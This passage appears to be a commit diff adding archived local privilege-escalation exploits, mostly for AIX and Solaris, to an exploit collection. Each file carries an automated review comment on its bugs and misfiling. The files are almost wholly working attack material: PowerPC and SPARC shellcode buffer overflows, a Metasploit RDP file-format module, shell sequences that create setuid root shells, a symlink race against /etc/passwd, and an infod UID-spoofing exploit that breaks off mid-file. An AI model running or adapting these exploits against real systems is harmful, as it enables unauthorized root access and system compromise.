memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+3);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/sbin/ipl_varyon";
args[1] = "-d";
args[2] = buffer;
args[3] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/sbin/ipl_varyon", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
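Review bot: this file is a copy of 1044.c apart from the target path ("/usr/sbin/ipl_varyon" with "-d") and the added "/* lsd */" attribution on the shellcode, and it carries the same defects: char *args[3] followed by args[3] = NULL is an out-of-bounds write, and cex_load_environment() advances env_buffer before using it for the terminator and the "CAU=" prefix. Duplicated harness code like this should be factored into one shared helper, or at least each copy should note which file is canonical so a fix is applied to all three.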

99
exploits/aix/local/1046.c Normal file

@ -0,0 +1,99 @@
/*
*
* IBM AIX paginit root exploit
*
* I just wanted to play with PowerPC (Tested on 5.2)
*
* intropy (intropy <at> caughq.org)
*
*/
#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <string.h>
#define DEBUG 1
#define BUFFERSIZE 8000
#define EGGSIZE 4003
#define NOP 0x60
#define ADDRESS 0x2ff22fff-EGGSIZE
/* lsd */
char shellcode_binsh[] =
"\x7c\xa5\x2a\x79" /* xor. r5,r5,r5 */
"\x40\x82\xff\xfd" /* bnel <shellcode> */
"\x7f\xe8\x02\xa6" /* mflr r31 */
"\x3b\xff\x01\x20" /* cal r31,0x120(r31) */
"\x38\x7f\xff\x08" /* cal r3,-248(r31) */
"\x38\x9f\xff\x10" /* cal r4,-240(r31) */
"\x90\x7f\xff\x10" /* st r3,-240(r31) */
"\x90\xbf\xff\x14" /* st r5,-236(r31) */
"\x88\x5f\xff\x0f" /* lbz r2,-241(r31) */
"\x98\xbf\xff\x0f" /* stb r5,-241(r31) */
"\x4c\xc6\x33\x42" /* crorc cr6,cr6,cr6 */
"\x44\xff\xff\x02" /* svca */
"/bin/sh"
"\x05";
unsigned long cex_load_environment(char *env_buffer, char *address_buffer, char *payload, int environment_size, int buffer_size) {
int count, env_size = strlen(payload) + environment_size + 4 + 1;
unsigned long address, *ret_addressp;
if (DEBUG) printf("Adding nops to environment buffer...");
for ( count = 0; count < env_size - strlen(payload) - 1; count++ ) {
*(env_buffer++) = NOP;
}
if (DEBUG) printf("size %d...\n", count);
if (DEBUG) printf("Adding payload to environment buffer...");
for ( count = 0; count < strlen(payload); count++ ) {
*(env_buffer++) = payload[count];
}
if (DEBUG) printf("size %d...\n", count);
env_buffer[env_size - 1] = '\0';
memcpy(env_buffer, "CAU=", 4);
memset(address_buffer, 'A', buffer_size);
address = ADDRESS;
if (DEBUG) printf("Going for address @ 0x%lx\n", address);
if (DEBUG) printf("Adding return address to buffer...");
ret_addressp = (unsigned long *)(address_buffer+2);
for ( count = 0; count < buffer_size; count += 4) {
*(ret_addressp++) = address;
}
if (DEBUG) printf("size %d...\n", count);
address_buffer[buffer_size - 1] = '\0';
return( 0 );
}
int main()
{
char *buffer, *egg;
char *args[3], *envs[2];
buffer = (char *)malloc(BUFFERSIZE);
egg = (char *)malloc(EGGSIZE);
cex_load_environment(egg, buffer, (char *)&shellcode_binsh, EGGSIZE, BUFFERSIZE);
args[0] = "/usr/bin/paginit";
args[1] = buffer;
args[2] = NULL;
envs[0] = egg;
envs[1] = NULL;
execve( "/usr/bin/paginit", args, envs );
return( 0 );
}
// milw0rm.com [2005-06-14]
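Review bot: unlike the two sibling files, this copy sizes args correctly (char *args[3] with args[2] = NULL), but it changes three constants without comment (BUFFERSIZE 8000, EGGSIZE 4003, ADDRESS 0x2ff22fff-EGGSIZE) and starts the return-address loop at address_buffer+2 instead of +3. A one-line comment explaining why these values differ for paginit would make the three files reviewable together. The env_buffer pointer-advance bug in cex_load_environment(), where the terminator and the "CAU=" prefix are written through the already-advanced pointer, is present here as well.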

73
exploits/aix/local/16659.rb Executable file

@ -0,0 +1,73 @@
##
# $Id: cain_abel_4918_rdp.rb 11127 2010-11-24 19:35:38Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::FILEFORMAT
def initialize(info = {})
super(update_info(info,
'Name' => 'Cain & Abel <= v4.9.24 RDP Buffer Overflow',
'Description' => %q{
This module exploits a stack-based buffer overflow in the Cain & Abel v4.9.24
and below. An attacker must send the file to victim, and the victim must open
the specially crafted RDP file under Tools -> Remote Desktop Password Decoder.
},
'License' => MSF_LICENSE,
'Author' => [ 'Trancek <trancek[at]yashira.org>' ],
'Version' => '$Revision: 11127 $',
'References' =>
[
[ 'CVE', '2008-5405' ],
[ 'OSVDB', '50342' ],
[ 'URL', 'http://www.milw0rm.com/exploits/7329' ],
[ 'BID', '32543' ],
],
'Payload' =>
{
'Space' => 800,
'BadChars' => "\x00\x0a\x0d\x3c\x22\x3e\x3d",
'EncoderType' => Msf::Encoder::Type::AlphanumMixed,
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
# Tested ok patrickw 20090503
[ 'Windows XP SP2 English', { 'Ret' => 0x7c82385d } ], #call esp
[ 'Windows XP SP0/1 English', { 'Ret' => 0x71ab7bfb } ], #jmp esp
[ 'Windows XP SP2 Spanish', { 'Ret' => 0x7c951eed } ], #jmp esp
],
'Privileged' => false,
'DisclosureDate' => 'Nov 30 2008',
'DefaultTarget' => 0))
register_options(
[
OptString.new('FILENAME', [ true, 'The file name.', 'exploit_cain.rdp']),
], self.class)
end
def exploit
filerdp = rand_text_alpha_upper(8206)
filerdp << [target.ret].pack('V') + [target.ret].pack('V')
filerdp << payload.encoded
print_status("Creating '#{datastore['FILENAME']}' file ...")
file_create(filerdp)
end
end
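Review bot: this module is a Windows file-format exploit (`'Platform' => 'win'`, `include Msf::Exploit::FILEFORMAT`, `$Id: cain_abel_4918_rdp.rb`), yet the commit stores it as exploits/aix/local/16659.rb, so AIX searches will return a Cain & Abel RDP-file module; the path or platform classification should be corrected. The description also reads `An attacker must send the file to victim` and wants an article (`to a victim`).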


@ -0,0 +1,13 @@
source: https://www.securityfocus.com/bid/17/info
By default, /usr/bin/chroot is improperly installed in Ultrix versions 4.0 and 4.1. Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.
$ mkdir /tmp/etc
$ echo root::0:0::/:/bin/sh > /tmp/etc/passwd
$ mkdir /tmp/bin
$ cp /bin/sh /tmp/bin/sh
$ cp /bin/chmod /tmp/bin/chmod
$ chroot /tmp /bin/login
Then login as root with no password. chmod /tmp/bin/sh
to 4700, exit and run the suid /tmp/bin/sh.
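Review bot: the entry concerns `/usr/bin/chroot` on Ultrix 4.0 and 4.1 (a DEC system) but is filed under exploits/aix/local; the platform should be Ultrix. The second sentence, `Anyone can execute /usr/bin/chroot this can lead to system users to gain unauthorized privileges.`, is missing its connective and reads better as `Anyone can execute /usr/bin/chroot, which can lead to system users gaining unauthorized privileges.`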


@ -0,0 +1,16 @@
source: https://www.securityfocus.com/bid/22/info
This applies to sites that have installed Sun Source tapes only.
The Sun distribution of sources (sunsrc) has an installation procedure which creates the directory /usr/release/bin and installs two setuid root files in it: makeinstall and winstall. These are both binary files which exec other programs: "make -k install" (makeinstall) or "install" (winstall) without a full path or reseting the PATH enviroment variable.
This makes it possible for users on that system to become root.
$ cp /bin/sh /tmp/sh
$ echo chmod 4777 /tmp/sh > /tmp/install
$ chmod a+rx /tmp/install
$ set PATH=/tmp:$PATH
$ export PATH
$ /usr/bin/winstall
$ /tmp/sh
#
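Review bot: the transcript mixes shell dialects: `$ set PATH=/tmp:$PATH` is csh syntax, while `$ export PATH` on the next line is Bourne syntax, and in sh `set PATH=...` only assigns a positional parameter; the two lines cannot both have done what the entry implies in one shell, so the session should be labelled with the shell used. The entry also concerns the Sun source tapes (sunsrc, `/usr/release/bin`) rather than AIX despite its exploits/aix/local location, and the description has `reseting` and `enviroment` for `resetting` and `environment`.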


@ -0,0 +1,6 @@
source: https://www.securityfocus.com/bid/59/info
/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.
$ /etc/crash
! sh
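Review bot: typos in the one-line description: `excutable` for `executable` and `to executes commands` for `to execute commands`. Unlike the neighbouring entries, no affected OS or release is named, so it is not clear which system shipped `/etc/crash` setgid kmem.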

13
exploits/aix/local/19213.sh Executable file

@ -0,0 +1,13 @@
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#!/bin/ksh
L=3000
STEP=34
MAX=16000
while [ $L -lt $MAX ]
do
./a.out $L
L=`expr $L + $STEP`
done
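Review bot: `#!/bin/ksh` is on line 3 of the file, after the bare `source:` URL and the description, so it is not an interpreter line and the file will not run as a ksh script when executed directly; either comment the two header lines (as 19344.sh does with `#source:`) or put the shebang first. The loop drives `./a.out $L` without saying which compiled program that is; a comment naming the companion entry from the same advisory (19214.c follows it in this commit) would make the pairing explicit.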

192
exploits/aix/local/19214.c Normal file

@ -0,0 +1,192 @@
// source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
/*
AIX 4.2/4.1 LC_MESSEGAS /usr/sbin/mount exploit by Georgi Guninski
----------------------------------------
DISCLAIMER
This program is for educational purpose ONLY. Do not use it without
permission.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski
is not liable for any damages caused by direct or indirect use of
the information or functionality provided by this program.
Georgi Guninski, his employer or any Internet provider bears NO
responsibility for content
or misuse of this program or any derivatives thereof.
By using this program you accept the fact that any damage (dataloss,
system
crash, system compromise, etc.) caused by the use of this program is
not
Georgi Guninski's responsibility.
In case you distribute this, please keep the disclaimer and my
addresses.
-----------------------------------------
Use the IBM C compiler.
Compile with: cc -g test2.c
-----------------
Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
Suggestions,comments and job offers are welcome!
22-Mar-97
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
char prog[100]="/usr/sbin/mount";
char prog2[30]="mount";
extern int execv();
char *createvar(char *name,char *value)
{
char *c;
int l;
l=strlen(name)+strlen(value)+4;
if (! (c=malloc(l))) {perror("error allocating");exit(2);};
strcpy(c,name);
strcat(c,"=");
strcat(c,value);
putenv(c);
return c;
}
/*The program*/
main(int argc,char **argv,char **env)
{
/*The code*/
unsigned int code[]={
0x7c0802a6 , 0x9421fbb0 , 0x90010458 , 0x3c60f019 ,
0x60632c48 , 0x90610440 , 0x3c60d002 , 0x60634c0c ,
0x90610444 , 0x3c602f62 , 0x6063696e , 0x90610438 ,
0x3c602f73 , 0x60636801 , 0x3863ffff , 0x9061043c ,
0x30610438 , 0x7c842278 , 0x80410440 , 0x80010444 ,
0x7c0903a6 , 0x4e800420, 0x0
};
/* disassembly
7c0802a6 mfspr r0,LR
9421fbb0 stu SP,-1104(SP) --get stack
90010458 st r0,1112(SP)
3c60f019 cau r3,r0,0xf019 --CTR
60632c48 lis r3,r3,11336 --CTR
90610440 st r3,1088(SP)
3c60d002 cau r3,r0,0xd002 --TOC
60634c0c lis r3,r3,19468 --TOC
90610444 st r3,1092(SP)
3c602f62 cau r3,r0,0x2f62 --'/bin/sh\x01'
6063696e lis r3,r3,26990
90610438 st r3,1080(SP)
3c602f73 cau r3,r0,0x2f73
60636801 lis r3,r3,26625
3863ffff addi r3,r3,-1
9061043c st r3,1084(SP) --terminate with 0
30610438 lis r3,SP,1080
7c842278 xor r4,r4,r4 --argv=NULL
80410440 lwz RTOC,1088(SP)
80010444 lwz r0,1092(SP) --jump
7c0903a6 mtspr CTR,r0
4e800420 bctr --jump
*/
#define MAXBUF 600
unsigned int buf[MAXBUF];
unsigned int frame[MAXBUF];
unsigned int i,nop,mn;
int max;
int QUIET=0;
int dobuf=0;
char VAR[30]="LC_MESSAGES";
unsigned int toc;
unsigned int eco;
unsigned int *pt;
char *t;
int egg=1;
int ch;
unsigned int reta; /* return address */
int corr=4604;
char *args[4];
char *newenv[8];
int justframes=1;
int startwith=0;
mn=78;
max=100;
if (argc>1)
corr = atoi(argv[1]);
pt=(unsigned *) &execv;
toc=*(pt+1);
eco=*pt;
if ( ((mn+strlen((char*)&code)/4)>max) || (max>MAXBUF) )
{
perror("Bad parameters");
exit(1);
}
#define OO 7
*((unsigned short *)code + OO + 2)=(unsigned short) (toc & 0x0000ffff);
*((unsigned short *)code + OO)=(unsigned short) ((toc >> 16) &
0x0000ffff);
*((unsigned short *)code + OO + 8 )=(unsigned short) (eco & 0x0000ffff);
*((unsigned short *)code + OO + 6 )=(unsigned short) ((eco >> 16) &
0x0000ffff);
reta=startwith ? (unsigned) &buf[mn]+corr : (unsigned)&buf[0]+corr;
for(nop=0;nop<mn;nop++)
buf[nop]=startwith ? reta : 0x4ffffb82; /*NOP*/
strcpy((char*)&buf[nop],(char*)&code);
i=nop+strlen( (char*) &code)/4-1;
if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000)
|| !(reta && 0xff000000))
{
perror("Return address has zero");exit(5);
}
while(i++<max)
buf[i]=reta;
buf[i]=0;
for(i=0;i<max-1;i++)
frame[i]=reta;
frame[i]=0;
if(QUIET) {puts((char*)&buf);fflush(stdout);exit(0);};
puts("Start...");/*Here we go*/
newenv[0]=createvar("EGGSHEL",(char*)&buf[0]);
newenv[1]=createvar("EGGSHE2",(char*)&buf[0]);
newenv[2]=createvar("EGGSHE3",(char*)&buf[0]);
newenv[3]=createvar("EGGSHE4",(char*)&buf[0]);
newenv[4]=createvar("DISPLAY",getenv("DISPLAY"));
newenv[5]=VAR[0] ? createvar(VAR,justframes ? (char*)&frame :
(char*)&buf):NULL;
newenv[6]=NULL;
args[0]=prog2;
execve(prog,args,newenv);
perror("Error executing execve \n");
/* Georgi Guninski
guninski@hotmail.com
sgg@vmei.acad.bg
guninski@linux2.vmei.acad.bg
http://www.geocities.com/ResearchTriangle/1711
*/
}
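Review bot: the guard `if( !(reta & 0xff) || !(reta && 0xff00) || !(reta && 0xff0000) || !(reta && 0xff000000))` uses logical `&&` for three of the four bytes, so `reta && 0xff00` is simply `reta != 0` and only the low byte is ever tested; the `Return address has zero` check is ineffective for the others and should use `&`. Separately, line 2 of the file (the description after the `// source:` line) is bare text outside any comment, so the file does not compile as archived; the same pattern appears in 19226.c, 19307.c and 19318.c in this batch. `main` is also declared without a return type.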


@ -0,0 +1,84 @@
/*
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
*/
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
offsets for 2.7/SPARC: 7144, 7152, 7160, 7168, and more...
offset for 2.6/SPARC: 5392
============================================================
*/
#define EV "LC_MESSAGES="
#define ADJUST 0
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main(int argc, char *argv[])
{
int OFFSET;
putenv("LANG=");
memset(x,'x',70000);
if (argc == 2)
OFFSET = atoi(argv[1]);
else
OFFSET = 5392; // default offset for 2.6
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) \
x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx, offset = %d\n",ret_adr, OFFSET);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/rsh","su",(char *)0);
}
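Review bot: no headers are included, so `memset`, `strlen`, `memcpy`, `putenv`, `atoi`, `printf` and `execl` are all implicitly declared; `ret_adr` is `unsigned int` but printed with `%lx`; and `get_sp` has no return statement, relying on `__asm__("mov %sp,%i0 \n")` leaving the value in the return register. The header (`Overflow Exploits( for Sparc Edition)`, offsets for Solaris 2.6 and 2.7) marks this as a Solaris/SPARC entry placed under exploits/aix/local; the advisory text does say the bug is in both AIX and Solaris, so the platform field should reflect that rather than AIX alone.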


@ -0,0 +1,61 @@
// source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
#include <fcntl.h>
/* arpexp.c
arp overflow proof of concept by ahmed@securityfocus.com
shellcode originally written by Cheez Whiz.
tested on x86 solaris 7,8beta
default should work. if not, arg1 = offset. +- by 100's
Except for shellcode, copyright Security-Focus.com, 11/2000
*/
long get_esp() { __asm__("movl %esp,%eax"); }
int main(int ac, char **av)
{
char shell[] = "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
"\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
"\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
"\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
"\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
"\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
"\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
"\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
"\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
"\x73\x68\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff";
unsigned long magic = 0x8047b78;
unsigned long r = get_esp() + 600;
unsigned char buf[300];
int f;
if (ac == 2)
r += atoi(av[1]);
memset(buf,0x61,sizeof(buf));
memcpy(buf+52,&magic,4);
memcpy(buf+76,&r,4);
f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
write(f,"1 2 3 4 ",8);
write(f,buf,sizeof(buf));
close(f);
memset(buf,0x90,sizeof(buf));
memcpy(buf,"LOL=",4);
memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
putenv(buf);
system("/usr/sbin/arp -f /tmp/ypx");
unlink("/tmp/ypx");
}
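Review bot: the header comment (`tested on x86 solaris 7,8beta`) and the `/usr/sbin/arp -f` target make this a Solaris x86 arp PoC, not an AIX one, so its exploits/aix/local path is wrong. Only `<fcntl.h>` is included, leaving `memset`, `memcpy`, `strlen`, `putenv`, `system`, `write`, `close`, `unlink` and `atoi` implicitly declared, and `int main` falls off the end without a return; line 2 (the description after `// source:`) is also bare text, so the file does not compile as stored. The scratch file is opened as `open("/tmp/ypx",O_CREAT|O_WRONLY,0600)` with a fixed name and no `O_EXCL`, the same predictable-tmp pattern the fwlsuser entry in this batch documents as a vulnerability.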


@ -0,0 +1,71 @@
/*
source: https://www.securityfocus.com/bid/268/info
A buffer overflow in libc's handling of the LC_MESSAGES environment variable allows a malicious user to exploit any suid root program linked agains libc to obtain root privileges. This problem is found in both IBM's AIX and Sun Microsystem's Solaris. This vulnerability allows local users to gain root privileges.
*/
/*============================================================
ex_lobc.c Overflow Exploits( for Sparc Edition)
The Shadow Penguin Security
(http://base.oc.to:/skyscraper/byte/551)
Written by UNYUN (unewn4th@usa.net)
============================================================
*/
#define EV "LC_MESSAGES="
#define ADJUST 0
#define OFFSET 5392
#define STARTADR 400
#define NOP 0xa61cc013
#define RETS 600
char x[80000];
char exploit_code[] =
"\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2b\x0b\xda\xdc\xae\x15\x63\x68"
"\x90\x0b\x80\x0e\x92\x03\xa0\x0c"
"\x94\x10\x20\x10\x94\x22\xa0\x10"
"\x9c\x03\xa0\x14"
"\xec\x3b\xbf\xec\xc0\x23\xbf\xf4\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd0\x20\x08\x90\x1b\xc0\x0f\x82\x10\x20\x01"
"\x91\xd0\x20\x08"
;
unsigned long get_sp(void)
{
__asm__("mov %sp,%i0 \n");
}
int i;
unsigned int ret_adr;
main()
{
putenv("LANG=");
memset(x,'x',70000);
for (i = 0; i < ADJUST; i++) x[i]=0x40;
for (i = ADJUST; i < 1000; i+=4){
x[i+3]=NOP & 0xff;
x[i+2]=(NOP >> 8 ) &0xff;
x[i+1]=(NOP >> 16 ) &0xff;
x[i+0]=(NOP >> 24 ) &0xff;
}
for (i=0;i<strlen(exploit_code);i++) x[STARTADR+i+ADJUST]=exploit_code[i];
ret_adr=get_sp()-OFFSET;
printf("jumping address : %lx\n",ret_adr);
if ((ret_adr & 0xff) ==0 ){
ret_adr -=16;
printf("New jumping address : %lx\n",ret_adr);
}
for (i = ADJUST+RETS; i < RETS+600; i+=4){
x[i+3]=ret_adr & 0xff;
x[i+2]=(ret_adr >> 8 ) &0xff;
x[i+1]=(ret_adr >> 16 ) &0xff;
x[i+0]=(ret_adr >> 24 ) &0xff;
}
memcpy(x,EV,strlen(EV));
x[3000]=0;
putenv(x);
execl("/bin/passwd","passwd",(char *)0);
}
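Review bot: this file duplicates 19216.c almost line for line (same ex_lobc.c header, `exploit_code[]`, NOP fill and return-address loops); the only differences are the hard-coded `#define OFFSET 5392` in place of the argv-driven offset, `execl("/bin/passwd","passwd",(char *)0)` in place of `/bin/rsh`, and the dropped offsets-for-2.7 comment. A cross-reference in each header would help maintainers, and the same defects carry over: no includes, `%lx` applied to an `unsigned int`, and a `get_sp` with no return statement.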


@ -0,0 +1,14 @@
soure: https://www.securityfocus.com/bid/287/info
IBM's eNetwork Firewall for AIX contains a number of vulnerability in scripts which manipulate files insecurely. When fwlsuser script is run it creates a temporary file called /tmp/fwlsuser.PID ( where PID is the process ID of the command being run ). If this file is created previously and is a link to any other file the output generated by the fwlsuser script will overwrite this linked file.
x = 5000
while true
LOCAL FIX AS REPORTED BY ORIGINATOR:
ln -s /etc/passwd /tmp/fwlsuser.$x
# rm /tmp/fwlsuser.$x
let x=$x+1
echo $x
done
exit
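Review bot: the body is neither prose nor a runnable script: `x = 5000` with spaces is not a shell assignment, `while true` has no `do`, and `LOCAL FIX AS REPORTED BY ORIGINATOR:` is advisory text sitting inside the loop body. The header also reads `soure:` for `source:`. The commented `# rm /tmp/fwlsuser.$x` appears to be the originator's remediation hint; it should be separated from the reproduction loop so a reader can tell which lines are the PoC and which are the fix.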

226
exploits/aix/local/19287.c Normal file

@ -0,0 +1,226 @@
/*
source: https://www.securityfocus.com/bid/370/info
Certain versions of AIX ship with an Information Daemon, infod. This program is designed to provide information about the OS and installed ancilliary programs. The daemon which runs as root, does not check credentials which are passed to it. This allows users to pass requests with arbitrary UID's. If a user passes infod a request as root, they can goto the default options menu and change the printer command line to an alternate binary such as /bin/sh that gives privileges to the account the session was spawned under.
*/
/* Infod AIX exploit (k) Arisme 21/11/98 - All Rights Reversed
Based on RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)
Run program with the login you want to exploit :)
When the window appears, select "options", "defaults", change printer
to something more useful (like /bin/x11/xterm) and print !
Comments,questions : arisme@altern.org */
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <netdb.h>
#include <stdio.h>
#include <stdlib.h>
#include <pwd.h>
#define TAILLE_BUFFER 2000
#define SOCK_PATH "/tmp/.info-help"
#define PWD "/tmp"
#define KOPY "Infod AIX exploit (k) Arisme 21/11/98\nAdvisory RSI.0011.11-09-98.AIX.INFOD (http://www.repsec.com)"
#define NOUSER "Use : infofun [login]"
#define UNKNOWN "User does not exist !"
#define OK "Waiting for magic window ... if you have problems check the xhost "
void send_environ(char *var,FILE *param)
{ char tempo[TAILLE_BUFFER];
int taille;
taille=strlen(var);
sprintf(tempo,"%c%s%c%c%c",taille,var,0,0,0);
fwrite(tempo,1,taille+4,param);
}
main(int argc,char** argv)
{ struct sockaddr_un sin,expediteur;
struct hostent *hp;
struct passwd *info;
int chaussette,taille_expediteur,port,taille_struct,taille_param;
char buffer[TAILLE_BUFFER],paramz[TAILLE_BUFFER],*disp,*pointeur;
FILE *param;
char *HOME,*LOGIN;
int UID,GID;
printf("\n\n%s\n\n",KOPY);
if (argc!=2) { printf("%s\n",NOUSER);
exit(1); }
info=getpwnam(argv[1]);
if (!info) { printf("%s\n",UNKNOWN);
exit(1); }
HOME=info->pw_dir;
LOGIN=info->pw_name;
UID=info->pw_uid;
GID=info->pw_gid;
param=fopen("/tmp/tempo.fun","wb");
chaussette=socket(AF_UNIX,SOCK_STREAM,0);
sin.sun_family=AF_UNIX;
strcpy(sin.sun_path,SOCK_PATH);
taille_struct=sizeof(struct sockaddr_un);
if (connect(chaussette,(struct sockaddr*)&sin,taille_struct)<0)
{ perror("connect");
exit(1); }
/* 0 0 PF_UID pf_UID 0 0 */
sprintf(buffer,"%c%c%c%c%c%c",0,0,UID>>8,UID-((UID>>8)*256),0,0);
fwrite(buffer,1,6,param);
/* PF_GID pf_GID */
sprintf(buffer,"%c%c",GID>>8,GID-((GID>>8)*256));
fwrite(buffer,1,2,param);
/* DISPLAY (259) */
bzero(buffer,TAILLE_BUFFER);
strcpy(buffer,getenv("DISPLAY"));
fwrite(buffer,1,259,param);
/* LANG (1 C 0 0 0 0 0 0 0) */
sprintf(buffer,"%c%c%c%c%c%c%c%c%c",1,67,0,0,0,0,0,0,0);
fwrite(buffer,1,9,param);
/* size_$HOME $HOME 0 0 0 */
send_environ(HOME,param);
/* size_$LOGNAME $LOGNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$USERNAME $USERNAME 0 0 0 */
send_environ(LOGIN,param);
/* size_$PWD $PWD 0 0 0 */
send_environ(PWD,param);
/* size_DISPLAY DISPLAY 0 0 0 */
//send_environ(ptsname(0),param);
/* If we send our pts, info_gr will crash as it has already changed UID *
/
send_environ("/dev/null",param);
/* It's probably not useful to copy all these environment vars but it was
good for debugging :) */
sprintf(buffer,"%c%c%c%c",23,0,0,0);
fwrite(buffer,1,4,param);
sprintf(buffer,"_=./startinfo");
send_environ(buffer,param);
sprintf(buffer,"TMPDIR=/tmp");
send_environ(buffer,param);
sprintf(buffer,"LANG=%s",getenv("LANG"));
send_environ(buffer,param);
sprintf(buffer,"LOGIN=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"NLSPATH=%s",getenv("NLSPATH"));
send_environ(buffer,param);
sprintf(buffer,"PATH=%s",getenv("PATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","EDITOR=emacs");
send_environ(buffer,param);
sprintf(buffer,"LOGNAME=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"MAIL=/usr/spool/mail/%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"HOSTNAME=%s",getenv("HOSTNAME"));
send_environ(buffer,param);
sprintf(buffer,"LOCPATH=%s",getenv("LOCPATH"));
send_environ(buffer,param);
sprintf(buffer,"%s","PS1=(exploited !) ");
send_environ(buffer,param);
sprintf(buffer,"USER=%s",LOGIN);
send_environ(buffer,param);
sprintf(buffer,"AUTHSTATE=%s",getenv("AUTHSTATE"));
send_environ(buffer,param);
sprintf(buffer,"DISPLAY=%s",getenv("DISPLAY"));
send_environ(buffer,param);
sprintf(buffer,"SHELL=%s",getenv("SHELL"));
send_environ(buffer,param);
sprintf(buffer,"%s","ODMDIR=/etc/objrepos");
send_environ(buffer,param);
sprintf(buffer,"HOME=%s",HOME);
send_environ(buffer,param);
sprintf(buffer,"%s","TERM=vt220");
send_environ(buffer,param);
sprintf(buffer,"%s","MAILMSG=[YOU HAVE NEW MAIL]");
send_environ(buffer,param);
sprintf(buffer,"PWD=%s",PWD);
